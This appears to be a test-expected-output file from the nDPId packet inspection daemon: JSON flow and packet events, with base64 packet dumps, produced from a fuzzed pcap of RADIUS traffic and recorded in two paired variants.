00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998314512,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998314512,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1528998314512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998314512,"pkt":"ABRP+4rqcNuYVcUnCABFAADADKZAAPwRR0XG4hk1CgxAHqgUchAArLr7A6UApAJ1Pjz8JGCwuo5GIgtQcZwBNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm5yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6QjM6MGM6OWIvMjQwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92a3Npa25lZE8HBAEABwBQEil3cnDy8\/cVSnBQY7FdIyI="} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1528998314512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998314512,"pkt":"ABRP+4rqcNuYVcUnCABFAADADKZAAPwRR0XG4hk1CgxAHqgUchAArLr7A6UApAJ1Pjz8JGCwuo5GIgtQcZwBNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm5yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6QjM6MGM6OWIvMjQwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92a3Npa25lZE8HBAEABwBQEil3cnDy8\/cVSnBQY7FdIyI="}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528998315061,"pkt":"AAAMB6xAABRPC4rqCABFAHfHIVdAAP8RAAAKDEAexuIZNXIQBxQCswAAAXcCq7birWrbSCR0XX2ECsyLDxcaCgAAVcgOBFVTGgwAAFfIDQZ3aWZp7g8AEFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqmrATUwMzExNDgwMDczNlA4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtN6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528998315061,"pkt":"AAAMB6xAABRPC4rqCABFAHfHIVdAAP8RAAAKDEAexuIZNXIQBxQCswAAAXcCq7birWrbSCR0XX2ECsyLDxcaCgAAVcgOBFVTGgwAAFfIDQZ3aWZp7g8AEFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqmrATUwMzExNDgwMDczNlA4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtN6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528998315379} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528998315379}
00728{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":313,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17152,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998315061,"pkt":"ABRU+4rqcNuYVcUnQwBFAAEwDOpAAPwRRszG4hk1CgxAHgcUchABHIc+AicBFAVYRP7z9BnlCK2x3nMNu9caCwAAV8gbBVNQQ\/1uAAABNxA0lSfZbnfLLhoh4+5ALjW4bpaGB\/F5lLUmaXWeOTpERaZCygHBXW8G5d8wRSUAsOoyXuERNO7GEB2l9DfyYkq5gsPl9gYDdVKWsTzavhi3cpWL4d4hWImwBdGLigMB9OjFS4NJg5i2ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29iay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBKDY\/Qv9KooB2GY4bCH4+IC"} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17152,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998315061,"pkt":"ABRU+4rqcNuYVcUnQwBFAAEwDOpAAPwRRszG4hk1CgxAHgcUchABHIc+AicBFAVYRP7z9BnlCK2x3nMNu9caCwAAV8gbBVNQQ\/1uAAABNxA0lSfZbnfLLhoh4+5ALjW4bpaGB\/F5lLUmaXWeOTpERaZCygHBXW8G5d8wRSUAsOoyXuERNO7GEB2l9DfyYkq5gsPl9gYDdVKWsTzavhi3cpWL4d4hWImwBdGLigMB9OjFS4NJg5i2ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29iay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBKDY\/Qv9KooB2GY4bCH4+IC"}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":313,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17152,"global_ts_msec":1528998315564} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":313,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17152,"global_ts_msec":1528998315564}
00620{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":315,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528998322857,"pkt":"ABRP+0zqcNuYVcUnCABFAAAlAL1AEPwRRw3G4hk1CgxAHgcUchAAzTbHC6gAxWfYqv2MMmfQQQEjLJV5MYwBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA3T0oBAgBIFwEAAAEFAAASnKqRiXtNkJ7pl81Lqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00606{"packet_event_id":1,"packet_event_name":"packet","packet_id":315,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528998322857,"pkt":"ABRP+0zqcNuYVcUnCABFAAAlAL1AEPwRRw3G4hk1CgxAHgcUchAAzTbHC6gAxWfYqv2MMmfQQQEjLJV5MYwBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA3T0oBAgBIFwEAAAEFAAASnKqRiXtNkJ7pl81Lqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":315,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205,"global_ts_msec":1528998323044} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":315,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205,"global_ts_msec":1528998323044}
00725{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":317,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998323340,"pkt":"ABRP+4rqcNsYVcUnCACOAAEwDMFAAPwRRrrG4hk1CgxAHgcUchABHN46AqkBFC7XsmGo9thH1H39z75ZofsaCwAAV8gbBVNQQxpuAAABNxA01fgke7cAxvNUQc8fbhbu8Vj1f4ydqDyFV6zE3SwbdURor5DaN1W5275SM8SlmfBSLKIRNMdp\/4Zs6S04Xowx3iRvmA3n8taa5E4m8wpB3etCd2VzmAkdeZLlem0oTIzBlWNTWH1RATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jSzgwLm1jYzMxMS4zZ3BwbmV0d2Vyay5vc04sIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBLs7b4ERJr4qPbI12xbGqC0"} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":317,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998323340,"pkt":"ABRP+4rqcNsYVcUnCACOAAEwDMFAAPwRRrrG4hk1CgxAHgcUchABHN46AqkBFC7XsmGo9thH1H39z75ZofsaCwAAV8gbBVNQQxpuAAABNxA01fgke7cAxvNUQc8fbhbu8Vj1f4ydqDyFV6zE3SwbdURor5DaN1W5275SM8SlmfBSLKIRNMdp\/4Zs6S04Xowx3iRvmA3n8taa5E4m8wpB3etCd2VzmAkdeZLlem0oTIzBlWNTWH1RATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jSzgwLm1jYzMxMS4zZ3BwbmV0d2Vyay5vc04sIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBLs7b4ERJr4qPbI12xbGqC0"}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":317,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998323568} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":317,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998323568}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998323340,"pkt":"AAAMB6xAABRP+4rqCABFAALbIVpEAP8RAAAKDEAexuIZNXIQBxQCxwAAAaoCv2Uj1+ujspK2VyIvdisE+iUaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998323340,"pkt":"AAAMB6xAABRP+4rqCABFAALbIVpEAP8RAAAKDEAexuIZNXIQBxQCxwAAAaoCv2Uj1+ujspK2VyIvdisE+iUaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528998338204} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528998338204}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1528998338382,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998338382,"pkt":"ABQlAIrqcNuYVcUnCABFAADhDOxAAPwRRt7G4hk1CgxASQcUchAAzQ2+C6oAxV4x6AhgYl+1t\/7aBLDTkJgBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Y6MzcvMjM3T0oBAgBIFwEAAAEFAAD9ndZ8FHhsyj5jhEswY1t0AgUAABpKKGv5SQAALFBpvDseP8KLAQACCwUAAC1HLAQoI0jpYeW4fPFsl+tQEgCJjyegSbpAOXlBuPG4l8E="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1528998338382,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998338382,"pkt":"ABQlAIrqcNuYVcUnCABFAADhDOxAAPwRRt7G4hk1CgxASQcUchAAzQ2+C6oAxV4x6AhgYl+1t\/7aBLDTkJgBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Y6MzcvMjM3T0oBAgBIFwEAAAEFAAD9ndZ8FHhsyj5jhEswY1t0AgUAABpKKGv5SQAALFBpvDseP8KLAQACCwUAAC1HLAQoI0jpYeW4fPFsl+tQEgCJjyegSbpAOXlBuPG4l8E="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00727{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998338669,"pkt":"ABRP+4rq8NuYVcUnCABFAAEwDPCkAPwRRos14hk1CgxAHgcUchABHImMAqsBFPNe2aGl6LP5y1u\/scR1o3AaCwAAV8gbBVNQOBpuAAABNxA0yJ0HwRo2kUg5GkMLWv3LIW9bZ\/+pjZx0CoGr7LPlqjfgOPOLXgeADm9RiTIaXTD+uAsRNK2vP2ZsGXahxC9sjBUhoGJOMJlzjqJyAyTjvpVvse28Qg5S9JgwmD8p+ZaQYnYBaM5xATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0JQByay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIrffGqrk1JHmvfqoB\/bRcD"} 00713{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998338669,"pkt":"ABRP+4rq8NuYVcUnCABFAAEwDPCkAPwRRos14hk1CgxAHgcUchABHImMAqsBFPNe2aGl6LP5y1u\/scR1o3AaCwAAV8gbBVNQOBpuAAABNxA0yJ0HwRo2kUg5GkMLWv3LIW9bZ\/+pjZx0CoGr7LPlqjfgOPOLXgeADm9RiTIaXTD+uAsRNK2vP2ZsGXahxC9sjBUhoGJOMJlzjqJyAyTjvpVvse28Qg5S9JgwmD8p+ZaQYnYBaM5xATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0JQByay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIrffGqrk1JHmvfqoB\/bRcD"}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998338865} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998338865}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998338669,"pkt":"AAAMB6xAABRP+4rqCABFAMrbIVxAAP8RAAAKDEAexuIZNXIQBxQCxwAAAawCvx+brty2uhj+WwEK9jJ7XPQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICSUASVNQUjEwGgkAADghDQM0NwZbIqnGATUwMzExNDgwMDczNjM4WTcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vciUAAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlQml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDA